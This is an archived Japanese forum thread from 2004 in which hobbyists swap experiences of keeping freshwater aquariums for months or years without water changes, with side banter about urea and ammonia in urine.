やっぱりムリか

117 ::04/01/06 16:39 ID:vJZtt37O
できたとしても、自然にできた水槽より不安定だろう。

どうでもいいけど、無生体で水槽立ち上げようかな。もちろんしょn(ry

118 :名無しさん@お腹いっぱい。:04/01/06 19:59 ID:idYcTHR4
60水槽で底砂ソイル、生体BEE50で水草色々で一年無換水足し水のみで普通に飼育してた。
コケなしでいまでも普通にキレイ。

119 :名無しさん@お腹いっぱい。:04/01/06 23:44 ID:dw/SSJNZ
>>113
「出す」=「排泄」ということならあながち間違っていない。

二酸化炭素とアンモニアで尿素が作られ、それを不要な水分等とを尿として排泄する事により
「人間が出すのは尿素」ということになるのだろう。

120 :名無しさん@お腹いっぱい。:04/01/07 12:16 ID:vFYX97/6
>>119
誰か日本語に翻訳してくれ(w

121 ::04/01/08 18:46 ID:zxea3ovv
人間の排出してるのはアンモニアではなくアンモ+二酸化炭素の「尿素」だと言うことかと。

122 :名無しさん@お腹いっぱい。:04/01/08 20:17 ID:846LXJaY
>>119
ん〜?何が言いたいのかよくわからんぞ?
結局「人間が出すのは尿素」でしょ?
「出す」=「排泄」以外になにかあるっけ?
何が言いたいのか...ただの追認か?

123 :名無しさん@お腹いっぱい。:04/01/08 22:00 ID:bFPlBVfs
尿は自分のを飲んだうえで語ってるよな?

124 :名無しさん@お腹いっぱい。:04/01/08 22:08 ID:WM67i/IX
>>119
人間の尿には尿素だけでなくアンモニアも含まれてるという
しごく初歩的なことを見落としてないか?


125 :名無しさん@お腹いっぱい。:04/01/08 22:23 ID:OE4GiqC3
密かにスカトロなスレ?

126 :名無しさん@お腹いっぱい。:04/01/09 19:09 ID:zhdFpE92
飲尿のことなら山崎拓に聞いてみよう

127 :名無しさん@お腹いっぱい。:04/01/10 01:35 ID:mGqvxtog
アンモニア2分子と二酸化炭素1分子で尿素と水になるとでも?


128 ::04/01/13 09:58 ID:TkHkdXUL
二酸化炭素とアンモニアで尿素が作られ、それを不要な水分等とを尿として排泄する事により
                          .~~~~~~~~~~~~~~~~~~~~~

129 :名無しさん@お腹いっぱい。:04/01/17 02:31 ID:uITulsdC
スカトロジーだな
こいつら自分の尿飲んでそうな予感

130 :名無しさん@お腹いっぱい。:04/01/20 14:32 ID:/CPQfbgv
濾過無しでほったらかし3年の60センチ水槽が有る。
たまに増えすぎたネジレモ間引くだけ。中身は小型カラシン。
砂利はフィリピン大磯。窓際において自然採光。コケは無い。

理屈は                        よく分からん。

131 :名無しさん@お腹いっぱい。:04/01/20 14:39 ID:/CPQfbgv
有るは、嘘だった。すまん。
部屋の外にヒサシを取り付けたんだが、ネジレモの調子が悪くなって
アボーンした。

それから家のあちこちで試しているが上手くいかん。
光強いとコケ出るし、弱いとネジレモ育たん。
ヒサシ壊すか・・・

132 :名無しさん@お腹いっぱい。:04/01/22 17:48 ID:zrukWZFc
昔60センチでグラミィとエンゼル飼っていたのだが
ヒーターの故障でグラミィ1匹残して全滅
とりあえず生き残りを30センチの水槽に放り込んだのだが
熱帯魚への情熱を失ってそのまま放置、忘却
ところが、水替え無し、餌無し、フィルター&ヒーター無しの完全放置水槽で
そのグラミィは半年も生きてやがった
植えっぱなしの水草をつついて飢えをしのいでいたみたい

半年を経て情熱が再燃した折、復活した60センチ水槽にそのグラミィを移してやったのだが
目に見えて痩せてたそいつは他魚にいじめられてすぐ死んじゃったけど

133 :名無しさん@お腹いっぱい。:04/01/23 22:11 ID:Vgy9hUcJ
アピ繁殖のためにはヤマトヌマエビは産卵したら、
かならず水槽から取り出した方がいいですか?

なかなかはしっこくって捕まえられません(--;)


134 :名無しさん@お腹いっぱい。:04/01/29 00:00 ID:Wa/CUEQl
長期間水換えなしってなんかすごいの?

135 :名無しさん@お腹いっぱい。:04/02/12 03:46 ID:q0sacgGc
俺は海水がメインだから淡水は好きじゃないけど
家族の淡水魚を仕方なく世話してる。

「淡水でナチュラル水槽を」・・という実験をしてみた。
結果は成功。水換えを1年していない。コケも生えない。
23リットル水槽。

生体は
ネオン、プレコ、コリドラス、苔取り貝、エビだの多数。水草も時々補給。

ポイントは、
1.底砂をかなり分厚くする。
2.底面フィルターを水槽底面の1/2ぶん設置する
 (使わないけど止水域として)
3.バイコムの淡水用嫌気性バクテリアをしばらく使用する。
  (注入場所は 底面フィルターのパイプからと底砂の中へスポイドで)
4.珪酸と燐酸の吸着剤を、外掛けフィルターにて使用する。

1年水換え無しで、
NO2NO3は全く検出されない。が、
燐酸珪酸の吸着剤を導入するのが最初からじゃなかったので
現在、徐々に除去中。水換えをすればバランスが崩れるので
水換え出来ない。



因みに、最近気が付いたこと、そりは、
水換えする方が、手間も金も掛からない。

136 :135:04/02/12 04:05 ID:q0sacgGc
補足

水換えしたくないのなら、
外部フィルターなどの高価な装置は使ってはいけない。
外掛け程度のものをチョロチョロと使う方がよいかも。

底砂の掃除もダメ。そんなのはエビにしてもらう。
ガラス掃除もダメ。燐酸珪酸で苔が目立つなら貝を増やす。

時々、気化した窒素がボコボコっと出てくる。
それを見るのが幸せ。

現在も使用している
燐酸と珪酸の吸着剤メーカーは、ここ
http://www.delphis.co.jp/liveseainfo2.htm

最初だけ使用した
嫌気性バクテリアのメーカーは、ここ
http://www.bicom.co.jp/aqua/products/21.html

137 :名無しさん@お腹いっぱい。:04/02/12 08:06 ID:rmfZCoJg
俺の水槽は試験合格したら好きなサイズの水槽買ってもらえるから五ヶ月間上部と外部フィルター
でがんばってる タイガーシャベル×2 レッドテールキャット ラプラディー セネガル×2
レッドテールキャットとタイガーのハイブリット タイガーとセルフィンのハイブリット
アイススポットシクリット×2

138 :名無しさん@お腹いっぱい。:04/02/12 08:57 ID:bWhs/OOM
>>137
で、それ全部飼いきれるの?

139 :名無しさん@お腹いっぱい。:04/02/12 09:25 ID:t8ea1VWK
試験勉強も良いが、アクアリウムの勉強もするべきだな。
最低、部屋並サイズの水槽が要る上、成長速度の差であっと言う間に食い合い。
濾過器は逆洗式にしてもらっておけよ(w

140 :名無しさん@お腹いっぱい。:04/02/12 11:32 ID:ZKxoBUiS
>>138,139
おまいらよく読め
137は「好きなサイズの水槽買ってもらえる」金持ちらしいぞ
池みたいな巨大な水槽買ってもらうつもりなんだろ

141 :名無しさん@お腹いっぱい。:04/02/12 13:30 ID:Kt1JaJBR
http://www.mars.dti.ne.jp/~gec/
ここ読んでみれ!水換えしなくても良いかもね・・・

142 :名無しさん@お腹いっぱい。:04/02/12 18:42 ID:t8ea1VWK
金持ち=大邸宅とも限らないので、そのつもりのレス(w

143 :名無しさん@お腹いっぱい。:04/03/13 18:11 ID:qZJRwwpa
水替えしなくても魚は元気なんだけど、水草が全然育たない水槽がある
カメ入れてるせいかもしれんが

144 :名無しさん@お腹いっぱい。:04/03/13 21:22 ID:2kdVRyB5
俺もぜんぜん水換えなしだよ。
水槽は90×45×45
フィルターは外部

生体はポリプ 2匹
餌のヒメダカ10〜200匹
水草多数

コケも生えないし ぜんぜん手間かからん

何かするといえば2〜3週間に一回、餌の
ヒメダカ入れるだけ!蒸発した水はヒメダカ
買ってきたとき、熱帯魚屋が入れてくれた水を
そのまま投入。これでもう一年半経つな!
もちろん、餌ヒメダカには餌はやらん!!


145 :名無しさん@お腹いっぱい。:04/03/14 15:38 ID:Hlarlhst
漏れもヒメダカを10円/匹で買うけどさすがにHCの水を
水槽には入れられないなぁ... (((( ;゜Д゜)))ガクガクブルブル 

146 :名無しさん@お腹いっぱい。:04/03/14 19:25 ID:U4Tj49XO
>>144
蒸発分の足し水は水槽内の濃度が変わらないから危険だぞ・・・

147 :名無しさん@お腹いっぱい。:04/03/15 20:31 ID:zI/1zVE4
でも多いよね。
足し水オンリー。

148 :名無しさん@お腹いっぱい。:04/03/17 09:19 ID:Go6WSMKX
帰省したら、金魚の白点病が治ってた。
2、3ヶ月水換えしてなかったらしい。
昨日、水槽掃除したら、上部フィルタ第一層が「藻」と化してた。水はもちろん緑色。
水が茶色だと汚れてる環境で、緑色だと良い環境になるのかな?

149 :名無しさん@お腹いっぱい。:04/03/17 09:45 ID:vm/Et2sj
60センチの水槽に上部フィルター

・ブラックネオンテトラ 6匹
・ネオンテトラ 15匹
・カージナルテトラ 4匹
・種類不明な熱帯魚 3匹
・セイルフィンプレコ 1匹
・ウィロー、ミクロソリウム モジャモジャ

多分半年は換えてない、フィルターのマットは先週(3ヶ月ぶりくらい)洗った。
2ヶ月に1匹くらい魚が死んでいくけど沢山いるから、まあいいか。

150 :名無しさん@お腹いっぱい。:04/03/17 17:47 ID:gWMJyB8p
海水の場合はさすがに水足しだけでは厳しいかなー?

151 :名無しさん@お腹いっぱい。:04/03/17 21:51 ID:3uboeZRV
>149
60cm水槽に30匹未満で、沢山魚がいるっていうの?
70〜100匹入っている水槽なら分かるんだけどね。
 死んでいく魚がかわいそうだよ。

152 :名無しさん@お腹いっぱい。:04/03/18 01:29 ID:5KZam6Ua
去年の6月から足し水しかしてないな。
30cm水槽でボララス・ウロフタルモイデスが2匹のみ。
水草もまばら。

153 :名無しさん@お腹いっぱい。:04/03/20 17:22 ID:Cs6slQLX
1年半、足し水のみ。

水槽:30cm規格
底砂:下から順に竹墨、腐葉土、赤土、熱帯魚安○サンド
住人:メスベタ2匹、アカヒレ2匹、白コリ2匹、プラティ2匹、レッドラムズホーン多数
水草:カボンバ、アナカリス、ナナ
濾過:水中濾過ポンプから汲み上げ →
    上部濾過槽を改造して作ったハイドロカルチャー → 水槽

ハイドロカルチャーはポトス、テーブルヤシ等、北国の真冬でも枯れることなく、わんさか。

42 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)